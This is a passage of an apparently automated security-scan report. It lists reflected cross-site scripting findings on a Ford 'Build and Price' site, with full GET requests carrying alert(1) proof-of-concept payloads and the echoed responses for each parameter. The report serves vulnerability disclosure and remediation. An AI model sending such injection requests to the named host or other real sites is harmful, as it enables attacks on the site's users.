Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:58:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121892

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en73c47'-alert(1)-'03a1a9968b',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'EconolineWagon',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed
...[SNIP]...

2.218. http://bp2.forddirect.fordvehicles.com/2011-Ford-EconolineWagon/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-EconolineWagon/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88238'-alert(1)-'ab140f2686c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-EconolineWagon/ChooseYourPath/?88238'-alert(1)-'ab140f2686c=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:57:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121851

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
citly on DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'88238'-alert(1)-'ab140f2686c':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Generic',
'Model':'EconolineWagon',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.219. http://bp2.forddirect.fordvehicles.com/2011-Ford-EconolineWagon/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-EconolineWagon/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce509'-alert(1)-'b23950c222 was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-EconolineWagon/ChooseYourPath/?branding=1&referringSite=1ce509'-alert(1)-'b23950c222&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:58:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121892

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1ce509'-alert(1)-'b23950c222',
'Skin':'Generic',
'Model':'EconolineWagon',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.220. http://bp2.forddirect.fordvehicles.com/2011-Ford-Edge/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Edge/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f439'-alert(1)-'f241a0ac826 was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Edge/ChooseYourPath/?branding=16f439'-alert(1)-'f241a0ac826&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'16f439'-alert(1)-'f241a0ac826',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Edge',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.221. http://bp2.forddirect.fordvehicles.com/2011-Ford-Edge/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Edge/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a0ee'-alert(1)-'301280c7180 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Edge/ChooseYourPath/?branding=1&referringSite=1&lang=en8a0ee'-alert(1)-'301280c7180 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:57:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en8a0ee'-alert(1)-'301280c7180',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Edge',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;

...[SNIP]...

2.222. http://bp2.forddirect.fordvehicles.com/2011-Ford-Edge/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Edge/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ca42'-alert(1)-'8b32a3c0587 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Edge/ChooseYourPath/?1ca42'-alert(1)-'8b32a3c0587=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121841

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
rue;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Generic',
'Model':'Edge',
'Year':'2011',
'1ca42'-alert(1)-'8b32a3c0587':'1'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.223. http://bp2.forddirect.fordvehicles.com/2011-Ford-Edge/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Edge/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f248e'-alert(1)-'f20168bea61 was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Edge/ChooseYourPath/?branding=1&referringSite=1f248e'-alert(1)-'f20168bea61&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:56:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1f248e'-alert(1)-'f20168bea61',
'Skin':'Generic',
'Model':'Edge',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.224. http://bp2.forddirect.fordvehicles.com/2011-Ford-Escape/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Escape/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae3fb'-alert(1)-'336a674ac06 was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Escape/ChooseYourPath/?branding=1ae3fb'-alert(1)-'336a674ac06&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121885

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1ae3fb'-alert(1)-'336a674ac06',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Escape',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.225. http://bp2.forddirect.fordvehicles.com/2011-Ford-Escape/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Escape/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c8f1'-alert(1)-'ad2200944e2 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Escape/ChooseYourPath/?branding=1&referringSite=1&lang=en6c8f1'-alert(1)-'ad2200944e2 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121885

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en6c8f1'-alert(1)-'ad2200944e2',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Escape',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
...[SNIP]...

2.226. http://bp2.forddirect.fordvehicles.com/2011-Ford-Escape/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Escape/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b065d'-alert(1)-'99dd0cca6fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Escape/ChooseYourPath/?b065d'-alert(1)-'99dd0cca6fa=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:52:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121843

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
citly on DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'b065d'-alert(1)-'99dd0cca6fa':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Generic',
'Model':'Escape',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.227. http://bp2.forddirect.fordvehicles.com/2011-Ford-Escape/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Escape/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80fc'-alert(1)-'50ee960a623 was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Escape/ChooseYourPath/?branding=1&referringSite=1d80fc'-alert(1)-'50ee960a623&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121885

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1d80fc'-alert(1)-'50ee960a623',
'Skin':'Generic',
'Model':'Escape',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.228. http://bp2.forddirect.fordvehicles.com/2011-Ford-Expedition/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Expedition/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b94f4'-alert(1)-'88cec325e1a was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Expedition/ChooseYourPath/?branding=1b94f4'-alert(1)-'88cec325e1a&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1b94f4'-alert(1)-'88cec325e1a',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Expedition',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</scrip
...[SNIP]...

2.229. http://bp2.forddirect.fordvehicles.com/2011-Ford-Expedition/ChooseYourPath/ [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Expedition/ChooseYourPath/

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6ed2'-alert(1)-'e8c9ce137f6 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Expedition/ChooseYourPath/?branding=1&referringSite=1&lang=end6ed2'-alert(1)-'e8c9ce137f6 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:56:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
DOMReady
var pageRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'end6ed2'-alert(1)-'e8c9ce137f6',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Generic',
'Model':'Expedition',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = t
...[SNIP]...

2.230. http://bp2.forddirect.fordvehicles.com/2011-Ford-Expedition/ChooseYourPath/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Expedition/ChooseYourPath/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ce7c'-alert(1)-'6dfcfd30377 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Expedition/ChooseYourPath/?6ce7c'-alert(1)-'6dfcfd30377=1 HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:52:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121847

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
dgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'Page':'ChooseYourPath',
'skipIntro':'true',
'Skin':'Generic',
'Model':'Expedition',
'6ce7c'-alert(1)-'6dfcfd30377':'1',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.231. http://bp2.forddirect.fordvehicles.com/2011-Ford-Expedition/ChooseYourPath/ [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-Expedition/ChooseYourPath/

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ba88'-alert(1)-'d199f71f74f was submitted in the referringSite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-Expedition/ChooseYourPath/?branding=1&referringSite=13ba88'-alert(1)-'d199f71f74f&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:53:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
= true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'13ba88'-alert(1)-'d199f71f74f',
'Skin':'Generic',
'Model':'Expedition',
'Year':'2011'};


function defineRefreshVariable(){
pageRefreshed = true;
}
</script>
...[SNIP]...

2.232. http://bp2.forddirect.fordvehicles.com/2011-Ford-F-150/ChooseYourPath/ [branding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp2.forddirect.fordvehicles.com
Path:   /2011-Ford-F-150/ChooseYourPath/

Issue detail

The value of the branding request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b67cc'-alert(1)-'da86424f6ff was submitted in the branding parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011-Ford-F-150/ChooseYourPath/?branding=1b67cc'-alert(1)-'da86424f6ff&referringSite=1&lang=en HTTP/1.1
Host: bp2.forddirect.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:57:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121908

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Build and Price</title>


<script type="text/javascript">
//<![CDATA[

...[SNIP]...
geRefreshed = false;
var preLaunch = false ;
var clubWTKWidgets = true;
var __affiliateInfo = null;
var urlParamMap = {
'document_referrer':document.referrer,'Make':'Ford',
'lang':'en',
'branding':'1b67cc'-alert(1)-'da86424f6ff',
'Page':'ChooseYourPath',
'skipIntro':'true',
'referringSite':'1',
'Skin':'Trucks',
'Model':'F-150',
'Year':'2011',
